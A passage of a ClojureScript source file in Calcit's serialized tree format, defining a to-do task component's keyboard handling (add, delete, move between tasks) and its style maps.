|D $ {} (:text |task-id) (:type :leaf) (:at 1518020148144) (:by |root) (:id |SJejE8iO8z)
|T $ {} (:text |text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bk2kzq991RrZ)
|j $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJT1f95cJASb)
:type :expr
:at 1500452996813
:by nil
:id |Bkj1Mq99k0BW
|v $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryyefcqcy0Sb)
|j $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkZlGcc9JCrb)
|j $ {} (:text |dispatch!) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1zlGqcqyAr-)
:type :expr
:at 1500452996813
:by nil
:id |H1xxzq9qkCBb
|r $ {}
:data $ {}
|T $ {} (:text |let) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkNeMc9qyRH-)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |event) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByDeM95c1CrW)
|j $ {}
:data $ {}
|T $ {} (:text |:event) (:type :leaf) (:at 1508039312342) (:by |root) (:id |ryYeM5c91ABZ)
|j $ {} (:text |e) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rk9gG5c9yArW)
:type :expr
:at 1500452996813
:by nil
:id |HydgMc951Rrb
:type :expr
:at 1500452996813
:by nil
:id |B1Ixfcq5J0SW
|j $ {}
:data $ {}
|T $ {} (:text |shift?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkhgf595kCBb)
|j $ {}
:data $ {}
|T $ {} (:text |.-shiftKey) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ0gM9q9yAHb)
|j $ {} (:text |event) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkJbf5q91Ar-)
:type :expr
:at 1500452996813
:by nil
:id |HJpef5991AS-
:type :expr
:at 1500452996813
:by nil
:id |BJsxfc9q1ASb
|n $ {}
:data $ {}
|T $ {} (:text |meta?) (:type :leaf) (:at 1508174152875) (:by |root) (:id |B1lIFwfa-leaf)
|j $ {}
:data $ {}
|T $ {} (:text |.-metaKey) (:type :leaf) (:at 1508174156235) (:by |root) (:id |rJbZUKvGab)
|j $ {} (:text |event) (:type :leaf) (:at 1508174157893) (:by |root) (:id |H1r8Fvza-)
:type :expr
:at 1508174153222
:by |root
:id |SkMWUFPf6W
:type :expr
:at 1508174151528
:by |root
:id |B1lIFwfa-
|r $ {}
:data $ {}
|T $ {} (:text |code) (:type :leaf) (:at 1508173477522) (:by |root) (:id |H1eTjUPGableaf)
|j $ {}
:data $ {}
|T $ {} (:text |:keycode) (:type :leaf) (:at 1508173479705) (:by |root) (:id |BJgRoIwzp-)
|j $ {} (:text |e) (:type :leaf) (:at 1508173479927) (:by |root) (:id |r1Ze2IwMaW)
:type :expr
:at 1508173478381
:by |root
:id |r1-0i8PMT-
:type :expr
:at 1508173477053
:by |root
:id |H1eTjUPGab
:type :expr
:at 1500452996813
:by nil
:id |rkrez5q51ABb
|r $ {}
:data $ {}
|T $ {} (:text |cond) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rybWfc55yCB-)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |and) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByVWzccc1AB-)
|j $ {} (:text |shift?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkH-M5951ABW)
|r $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1DWG95qJArb)
|j $ {} (:text |13) (:type :leaf) (:at 1629051646728) (:by |Qr5ffqtY) (:id |SJ_Wfc99JCB-)
|r $ {} (:text |code) (:type :leaf) (:at 1508173557967) (:by |root) (:id |Bkg3gwwf6b)
:type :expr
:at 1500452996813
:by nil
:id |rk8ZfqccJCBW
:type :expr
:at 1500452996813
:by nil
:id |HkQZzc95kRHb
|j $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJa-Mcc9k0HW)
|j $ {}
:data $ {}
|T $ {} (:text |not) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SykGM59qyCH-)
|j $ {}
:data $ {}
|T $ {} (:text |.blank?) (:type :leaf) (:at 1629051701885) (:by |Qr5ffqtY) (:id |B1-zGq9ckCHb)
|j $ {} (:text |text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkMMG9qqJ0SZ)
:type :expr
:at 1500452996813
:by nil
:id |BJeMf9qqk0rW
:type :expr
:at 1500452996813
:by nil
:id |HJC-Gc9qk0Sb
|r $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B14MM555JRr-)
|j $ {} (:text |:task/add-before) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJBGGcqqy0S-)
|r $ {} (:text |task-id) (:type :leaf) (:at 1518020160289) (:by |root) (:id |ByLfGcqc1ABZ)
:type :expr
:at 1500452996813
:by nil
:id |HkmfM9c5JCrW
:type :expr
:at 1500452996813
:by nil
:id |B13bz995JAS-
:type :expr
:at 1500452996813
:by nil
:id |ryzbfc9qkCBZ
|n $ {}
:data $ {}
|T $ {}
:data $ {}
|D $ {} (:text |and) (:type :leaf) (:at 1508040655341) (:by |root) (:id |r1gw0Jveab)
|L $ {}
:data $ {}
|T $ {} (:text |.blank?) (:type :leaf) (:at 1629051703490) (:by |Qr5ffqtY) (:id |B1NPC1DgTZ)
|j $ {} (:text |text) (:type :leaf) (:at 1508040660781) (:by |root) (:id |H1x30yDg6-)
:type :expr
:at 1508040656194
:by |root
:id |H1ORywe6W
|T $ {}
:data $ {}
|D $ {} (:text |and) (:type :leaf) (:at 1508174169283) (:by |root) (:id |SJbgvFvf6b)
|T $ {}
:data $ {}
|D $ {} (:text |or) (:type :leaf) (:at 1508174139772) (:by |root) (:id |SklXrYDzpb)
|L $ {} (:text |shift?) (:type :leaf) (:at 1508174142107) (:by |root) (:id |Byl4rtvMT-)
|P $ {} (:text |meta?) (:type :leaf) (:at 1508174149919) (:by |root) (:id |HkwHYwzpW)
:type :expr
:at 1508174138663
:by |root
:id |S1QrtDzTZ
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1508040590666) (:by |root) (:id |ryxU51vxableaf)
|j $ {} (:text |8) (:type :leaf) (:at 1629051657275) (:by |Qr5ffqtY) (:id |SJeu91vgTb)
|r $ {} (:text |code) (:type :leaf) (:at 1508173563705) (:by |root) (:id |HkxQ-DDza-)
:type :expr
:at 1508040591780
:by |root
:id |rke4DKPzpb
:type :expr
:at 1508174167900
:by |root
:id |r1llwtwfa-
:type :expr
:at 1508040654580
:by |root
:id |Byv01PlaZ
|j $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJOaZ99ck0r-)
|j $ {} (:text |:task/delete) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyFaZ5qckRBW)
|r $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1518020587211) (:by |root) (:id |SyXeuidUz)
|T $ {} (:text |task-id) (:type :leaf) (:at 1518020505623) (:by |root) (:id |SJcpb59ck0HW)
|j $ {} (:text |idx) (:type :leaf) (:at 1518020588450) (:by |root) (:id |H1Exdou8G)
:type :expr
:at 1518020586054
:by |root
:id |SJfgOsOUG
:type :expr
:at 1500452996813
:by nil
:id |rkZMikPeaZ
:type :expr
:at 1508040590032
:by |root
:id |ryxU51vxab
|r $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |and) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1tGf5q5kCH-)
|j $ {}
:data $ {}
|T $ {} (:text |not) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJiMfcqck0HZ)
|j $ {} (:text |shift?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1hfzqq5yRSb)
:type :expr
:at 1500452996813
:by nil
:id |B1qMzcc910rb
|r $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bk0fzq951AHb)
|j $ {} (:text |13) (:type :leaf) (:at 1629051648560) (:by |Qr5ffqtY) (:id |r1y7f5c5yAB-)
|r $ {} (:text |code) (:type :leaf) (:at 1508173566438) (:by |root) (:id |r1WSbDwMTZ)
:type :expr
:at 1500452996813
:by nil
:id |Bkazz9cqkCHW
:type :expr
:at 1500452996813
:by nil
:id |S1OMGc991CB-
|j $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyEmfc9qyArW)
|j $ {}
:data $ {}
|T $ {} (:text |not) (:type :leaf) (:at 1500452996813) (:by |root) (:id |By87Mc9q1CBZ)
|j $ {}
:data $ {}
|T $ {} (:text |.blank?) (:type :leaf) (:at 1629051705376) (:by |Qr5ffqtY) (:id |HyuXzqc5y0BZ)
|j $ {} (:text |text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJKXzqqcJ0rW)
:type :expr
:at 1500452996813
:by nil
:id |B1wQG9cq10HW
:type :expr
:at 1500452996813
:by nil
:id |S1r7Mq5cJArZ
|r $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BksQf555yAHW)
|j $ {} (:text |:task/add-after) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJhmfcc5y0B-)
|r $ {} (:text |task-id) (:type :leaf) (:at 1518020154628) (:by |root) (:id |rkT7Gq95kRrW)
:type :expr
:at 1500452996813
:by nil
:id |H197fc9cJCH-
:type :expr
:at 1500452996813
:by nil
:id |r1XQz5c91CB-
:type :expr
:at 1500452996813
:by nil
:id |rJDzGq9qyAr-
|t $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |and) (:type :leaf) (:at 1508173460254) (:by |root) (:id |ryoc8vzT-leaf)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1508173465279) (:by |root) (:id |rkZkj8vGT-)
|j $ {} (:text |38) (:type :leaf) (:at 1629051681915) (:by |Qr5ffqtY) (:id |r1GiLDGp-)
|r $ {} (:text |code) (:type :leaf) (:at 1508173486059) (:by |root) (:id |Hy82LPGab)
:type :expr
:at 1508173465027
:by |root
:id |B1Zo8wGp-
:type :expr
:at 1508173460476
:by |root
:id |HJb3cLPM6W
|j $ {}
:data $ {}
|D $ {} (:text |do) (:type :leaf) (:at 1508174104109) (:by |root) (:id |rkg7twMp-)
|T $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1508173488866) (:by |root) (:id |H1gvnUPz6-leaf)
|j $ {} (:text |:pointer/before) (:type :leaf) (:at 1508173536280) (:by |root) (:id |SketnIvM6b)
:type :expr
:at 1508173486970
:by |root
:id |H1gvnUPz6-
|j $ {}
:data $ {}
|T $ {} (:text |.preventDefault) (:type :leaf) (:at 1508174028909) (:by |root) (:id |HJezAdPMpW)
|j $ {} (:text |event) (:type :leaf) (:at 1508174029628) (:by |root) (:id |HJfBAuDfp-)
:type :expr
:at 1508174026210
:by |root
:id |r1fXFPMaZ
:type :expr
:at 1508174103476
:by |root
:id |S1-kXFwGTZ
:type :expr
:at 1508173458984
:by |root
:id |ryoc8vzT-
|u $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |and) (:type :leaf) (:at 1508173460254) (:by |root) (:id |ryoc8vzT-leaf)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1508173465279) (:by |root) (:id |rkZkj8vGT-)
|j $ {} (:text |40) (:type :leaf) (:at 1629051689756) (:by |Qr5ffqtY) (:id |r1GiLDGp-)
|r $ {} (:text |code) (:type :leaf) (:at 1508173486059) (:by |root) (:id |Hy82LPGab)
:type :expr
:at 1508173465027
:by |root
:id |B1Zo8wGp-
:type :expr
:at 1508173460476
:by |root
:id |HJb3cLPM6W
|j $ {}
:data $ {}
|D $ {} (:text |do) (:type :leaf) (:at 1508174108608) (:by |root) (:id |SkZNXFPGTZ)
|T $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1508173488866) (:by |root) (:id |H1gvnUPz6-leaf)
|j $ {} (:text |:pointer/after) (:type :leaf) (:at 1508173542132) (:by |root) (:id |SketnIvM6b)
:type :expr
:at 1508173486970
:by |root
:id |H1gvnUPz6-
|j $ {}
:data $ {}
|T $ {} (:text |.preventDefault) (:type :leaf) (:at 1508174028909) (:by |root) (:id |HJezAdPMpW)
|j $ {} (:text |event) (:type :leaf) (:at 1508174029628) (:by |root) (:id |HJfBAuDfp-)
:type :expr
:at 1508174026210
:by |root
:id |B1IXKwMpW
:type :expr
:at 1508174107937
:by |root
:id |S1g4mtwzT-
:type :expr
:at 1508173458984
:by |root
:id |ry5yvDGTb
|v $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |and) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bkl4fq9qJRHW)
|j $ {} (:text |shift?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkbVz595yRrZ)
|r $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1XVM59q10SZ)
|j $ {} (:text |9) (:type :leaf) (:at 1629051669869) (:by |Qr5ffqtY) (:id |rkV4fqcq10BZ)
|r $ {} (:text |code) (:type :leaf) (:at 1508173570136) (:by |root) (:id |SkWtZPPfpZ)
:type :expr
:at 1500452996813
:by nil
:id |H1zEG59q1RBb
:type :expr
:at 1500452996813
:by nil
:id |BkkEGcccyAB-
|j $ {}
:data $ {}
|T $ {} (:text |do) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkYNMcc5yAHZ)
|j $ {}
:data $ {}
|T $ {} (:text |.preventDefault) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyoNG95ckCrb)
|j $ {} (:text |event) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Byn4zqqckCBb)
:type :expr
:at 1500452996813
:by nil
:id |SJ9Nf99cyAr-
|r $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkANM5c5JAS-)
|j $ {} (:text |:pointer/before) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BykBGc55JCrb)
|r $ {} (:text |nil) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HygSzqcqkCS-)
:type :expr
:at 1500452996813
:by nil
:id |HJaEf59cy0S-
:type :expr
:at 1500452996813
:by nil
:id |HyuVfqq51CH-
:type :expr
:at 1500452996813
:by nil
:id |BJRmf5c5kRH-
|x $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |and) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkXrzq59y0H-)
|j $ {}
:data $ {}
|T $ {} (:text |not) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1rrf5qc10rZ)
|j $ {} (:text |shift?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkIrz59qJABZ)
:type :expr
:at 1500452996813
:by nil
:id |SkErf5c9JASb
|r $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1drGccq1RSZ)
|j $ {} (:text |9) (:type :leaf) (:at 1629051671236) (:by |Qr5ffqtY) (:id |BJFHzq9qk0rb)
|r $ {} (:text |code) (:type :leaf) (:at 1508173572041) (:by |root) (:id |rJnbvvG6b)
:type :expr
:at 1500452996813
:by nil
:id |HywrG9cqJRrb
:type :expr
:at 1500452996813
:by nil
:id |SJzrM99ckRr-
|j $ {}
:data $ {}
|T $ {} (:text |do) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rk0rG5q9yCHb)
|j $ {}
:data $ {}
|T $ {} (:text |.preventDefault) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SklUzq95yArb)
|j $ {} (:text |event) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hk-LM55q10r-)
:type :expr
:at 1500452996813
:by nil
:id |ry1Lf9ccJArZ
|r $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1mIfc5cyRH-)
|j $ {} (:text |:pointer/after) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJN8z9q9kCBZ)
|r $ {} (:text |nil) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJSUG9cq10BW)
:type :expr
:at 1500452996813
:by nil
:id |S1MLf555kAr-
:type :expr
:at 1500452996813
:by nil
:id |S1Trfq59kArb
:type :expr
:at 1500452996813
:by nil
:id |HkbBGc9ck0Sb
:type :expr
:at 1500452996813
:by nil
:id |ryxbG9q9yASb
:type :expr
:at 1500452996813
:by nil
:id |BJ7lGc5c1CBZ
:type :expr
:at 1500452996813
:by nil
:id |BJ0Jfqcck0rb
:type :expr
:at 1500452996813
:by nil
:id |rJdJfc5cyRS-
|style-done $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1Hkb9c9yCrW)
|j $ {} (:text |style-done) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJ8ybccqJABZ)
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1OkWc5c1AHZ)
|j $ {}
:data $ {}
|T $ {} (:text |:width) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bk9JZ95cJ0B-)
|j $ {} (:text |16) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1i1W9q5yArZ)
:type :expr
:at 1500452996813
:by nil
:id |HJFJ-q99y0rb
|r $ {}
:data $ {}
|T $ {} (:text |:height) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HyaJW9ccyArW)
|j $ {} (:text |16) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1A1W9c51RrW)
:type :expr
:at 1500452996813
:by nil
:id |Synybc9q10BW
|v $ {}
:data $ {}
|T $ {} (:text |:background-color) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HylxWcqckRrW)
|j $ {}
:data $ {}
|T $ {} (:text |hsl) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJMgb95cy0r-)
|j $ {} (:text |240) (:type :leaf) (:at 1514170201103) (:by |root) (:id |rkXlW599JArW)
|r $ {} (:text |90) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Sy4lZ5cc1RSb)
|v $ {} (:text |88) (:type :leaf) (:at 1514170218757) (:by |root) (:id |ByBlW99qkArW)
|x $ {} (:text |0.3) (:type :leaf) (:at 1518168766763) (:by |root) (:id |ryMpcksUM)
:type :expr
:at 1500452996813
:by nil
:id |HJ-e-q5ckRSW
:type :expr
:at 1500452996813
:by nil
:id |BJkx-cqqyCrW
|x $ {}
:data $ {}
|T $ {} (:text |:cursor) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkdeZq5c1CSW)
|j $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HyFgZ9c9JCrW)
:type :expr
:at 1500452996813
:by nil
:id |SkvxW95q1RHW
|y $ {}
:data $ {}
|T $ {} (:text |:transition-duration) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1oxWqc91Ar-)
|j $ {} (:text ||300ms) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1nlW5551Rrb)
:type :expr
:at 1500452996813
:by nil
:id |Sk9eb5q5JRHZ
:type :expr
:at 1500452996813
:by nil
:id |ByP1b955k0SW
:type :expr
:at 1500452996813
:by nil
:id |S1E1Wq95kCBW
|style-task $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ry76l99cyRrb)
|j $ {} (:text |style-task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkNTlqc9k0BZ)
|r $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |:background-color) (:type :leaf) (:at 1519746508250) (:by |root) (:id |r1kAaemdzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |hsl) (:type :leaf) (:at 1519746508868) (:by |root) (:id |HJEECagXOG)
|j $ {} (:text |0) (:type :leaf) (:at 1519746510920) (:by |root) (:id |rkmB0axQ_M)
|r $ {} (:text |0) (:type :leaf) (:at 1519746511129) (:by |root) (:id |SkbwCpe7dz)
|v $ {} (:text |94) (:type :leaf) (:at 1519749689130) (:by |root) (:id |HymDC6lmdG)
:type :expr
:at 1519746508538
:by |root
:id |SyHRae7_G
:type :expr
:at 1519746502576
:by |root
:id |r1kAaemdz
|yj $ {}
:data $ {}
|T $ {} (:text |:min-width) (:type :leaf) (:at 1519746594830) (:by |root) (:id |Hy-OQAxXuzleaf)
|j $ {} (:text |600) (:type :leaf) (:at 1519749698501) (:by |root) (:id |Sy2QAxXuG)
:type :expr
:at 1519746592438
:by |root
:id |Hy-OQAxXuz
|yr $ {}
:data $ {}
|T $ {} (:text |:cursor) (:type :leaf) (:at 1519746623973) (:by |root) (:id |ByeIHCg7OGleaf)
|j $ {} (:text |:move) (:type :leaf) (:at 1519746627770) (:by |root) (:id |SJfOSAlQ_M)
:type :expr
:at 1519746622115
:by |root
:id |ByeIHCg7OG
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |By8Teqq9JCHZ)
|j $ {}
:data $ {}
|T $ {} (:text |:position) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJdaec9qJAHW)
|j $ {} (:text |:absolute) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJtTe5q5J0SZ)
:type :expr
:at 1500452996813
:by nil
:id |rkPpl55qyABZ
|r $ {}
:data $ {}
|T $ {} (:text |:padding) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkjpecc9kCrW)
|j $ {} (:text "||0 16px") (:type :leaf) (:at 1519749681502) (:by |root) (:id |B1n6x55910Sb)
:type :expr
:at 1500452996813
:by nil
:id |H196e99qyCB-
|v $ {}
:data $ {}
|T $ {} (:text |:transition-duration) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1RTgqq5yRr-)
|j $ {} (:text ||300ms) (:type :leaf) (:at 1519746828746) (:by |root) (:id |rk10e9c5k0B-)
:type :expr
:at 1500452996813
:by nil
:id |SJpTe95cJ0Sb
|w $ {}
:data $ {}
|T $ {} (:text |:transition-property) (:type :leaf) (:at 1518169785564) (:by |root) (:id |SJ63R1oUzleaf)
|j $ {} (:text ||top) (:type :leaf) (:at 1518169787350) (:by |root) (:id |HylM60JoUM)
:type :expr
:at 1518169780875
:by |root
:id |SJ63R1oUz
|x $ {}
:data $ {}
|T $ {} (:text |:align-items) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkWAe555kArb)
|j $ {} (:text |:center) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJGRg99cyRBW)
:type :expr
:at 1500452996813
:by nil
:id |B1lClqqqJ0rb
|y $ {}
:data $ {}
|T $ {} (:text |:transform-origin) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HyERe9cq1ABW)
|j $ {} (:text "||8% 50%") (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJSCeccc1CBb)
:type :expr
:at 1500452996813
:by nil
:id |BymAlcqqJArZ
:type :expr
:at 1500452996813
:by nil
:id |r1Saxc551CHZ
:type :expr
:at 1500452996813
:by nil
:id |Hkzpxq551RSZ
|style-text $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJnp-595k0rW)
|j $ {} (:text |style-text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hypp-c5cJCHZ)
|r $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |:font-weight) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hy4CZc5c1RBZ)
|j $ {} (:text |300) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1S0b9cqkABb)
:type :expr
:at 1500452996813
:by nil
:id |HJ70bc59y0S-
|yj $ {}
:data $ {}
|T $ {} (:text |:padding) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJx1G95qyCB-)
|j $ {} (:text "||0 4px") (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hk-1f995JRHW)
:type :expr
:at 1500452996813
:by nil
:id |BJ11Mq9cyRSW
|yr $ {}
:data $ {}
|T $ {} (:text |:line-height) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bk-RW99c1ABb)
|j $ {} (:text ||48px) (:type :leaf) (:at 1518169260451) (:by |root) (:id |H1GCZ99c1CS-)
:type :expr
:at 1500452996813
:by nil
:id |BJlR-c55y0rb
|yv $ {}
:data $ {}
|T $ {} (:text |:height) (:type :leaf) (:at 1518169231457) (:by |root) (:id |rkeI921sLMleaf)
|j $ {} (:text |48) (:type :leaf) (:at 1518169262217) (:by |root) (:id |BkPvq2JiIf)
:type :expr
:at 1518169229951
:by |root
:id |rkeI921sLM
|yx $ {}
:data $ {}
|T $ {} (:text |:min-width) (:type :leaf) (:at 1519746558588) (:by |root) (:id |rJz-CgmuMleaf)
|j $ {} (:text |48) (:type :leaf) (:at 1519746559060) (:by |root) (:id |rkxvbCem_f)
:type :expr
:at 1519746553660
:by |root
:id |rJz-CgmuM
|yy $ {}
:data $ {}
|T $ {} (:text |:border) (:type :leaf) (:at 1527010370981) (:by |root) (:id |Bk9H4RZJQleaf)
|j $ {} (:text |:none) (:type :leaf) (:at 1527010372544) (:by |root) (:id |ry3SVAZk7)
:type :expr
:at 1527010369737
:by |root
:id |Bk9H4RZJQ
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |By1AZccqkCBZ)
|j $ {}
:data $ {}
|T $ {} (:text |:width) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJPCbc55k0B-)
|j $ {} (:text |600) (:type :leaf) (:at 1518169373634) (:by |root) (:id |Skd0bqqq1Rrb)
:type :expr
:at 1500452996813
:by nil
:id |SJUAb5c9JCrW
|r $ {}
:data $ {}
|T $ {} (:text |:background-color) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Sym1GqqqyRB-)
|j $ {} (:text |:transparent) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkVyzcq9JRHb)
:type :expr
:at 1500452996813
:by nil
:id |BJGkzqc91ASW
|v $ {}
:data $ {}
|T $ {} (:text |:color) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1pAW5c5yRHZ)
|j $ {}
:data $ {}
|T $ {} (:text |hsl) (:type :leaf) (:at 1508042007323) (:by |root) (:id |HyACb959JRS-)
|j $ {} (:text |0) (:type :leaf) (:at 1508042007642) (:by |root) (:id |B14yQSPep-)
|r $ {} (:text |0) (:type :leaf) (:at 1508042007853) (:by |root) (:id |rklgmBDepb)
|v $ {} (:text |20) (:type :leaf) (:at 1508042016595) (:by |root) (:id |BJMg7Swe6Z)
:type :expr
:at 1508042006815
:by |root
:id |SkxkQBDlpb
:type :expr
:at 1500452996813
:by nil
:id |BJhAZ5qcJCr-
|x $ {}
:data $ {}
|T $ {} (:text |:font-size) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bk90W5qqJ0Bb)
|j $ {} (:text |16) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1oR-59c10Sb)
:type :expr
:at 1500452996813
:by nil
:id |HJY0Zq59yAHb
|y $ {}
:data $ {}
|T $ {} (:text |:font-family) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByLkM99q1RBW)
|j $ {} (:text ||Hind) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJvyG5c9y0HZ)
:type :expr
:at 1500452996813
:by nil
:id |B1BJMccc10BW
:type :expr
:at 1500452996813
:by nil
:id |SkRTW5q5y0B-
:type :expr
:at 1500452996813
:by nil
:id |H1iTWcqcyRBW
:proc $ {}
:data $ {}
:type :expr
:at 1500452996813
:by nil
:id |rk0ix55q1AS-
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkJYxcq9kRrb)
|j $ {} (:text |app.comp.task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SygFg55cJAHW)
|v $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ry9igqqc1ASZ)
|j $ {} (:text |clojure.string) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1sjgq9q10H-)
|r $ {} (:text |:as) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1nsec95JRH-)
|v $ {} (:text |string) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJasg99qJASZ)
:type :expr
:at 1500452996813
:by nil
:id |r1tseqc9JCSb
|yr $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1519745769259) (:by |root) (:id |Skxbeol7ufleaf)
|j $ {} (:text |app.util.dom) (:type :leaf) (:at 1519745779274) (:by |root) (:id |HJX-ejgmdM)
|r $ {} (:text |:refer) (:type :leaf) (:at 1519745780082) (:by |root) (:id |HyQjgjlQOf)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1519745780520) (:by |root) (:id |SJrngigmuM)
|j $ {} (:text |get-width) (:type :leaf) (:at 1519745984439) (:by |root) (:id |ryg6xsgQOG)
:type :expr
:at 1519745780297
:by |root
:id |BJIhgslXOM
:type :expr
:at 1519745768941
:by |root
:id |Skxbeol7uf
|T $ {} (:text |:require) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1RYx55ckAHb)
|j $ {}
:data $ {}
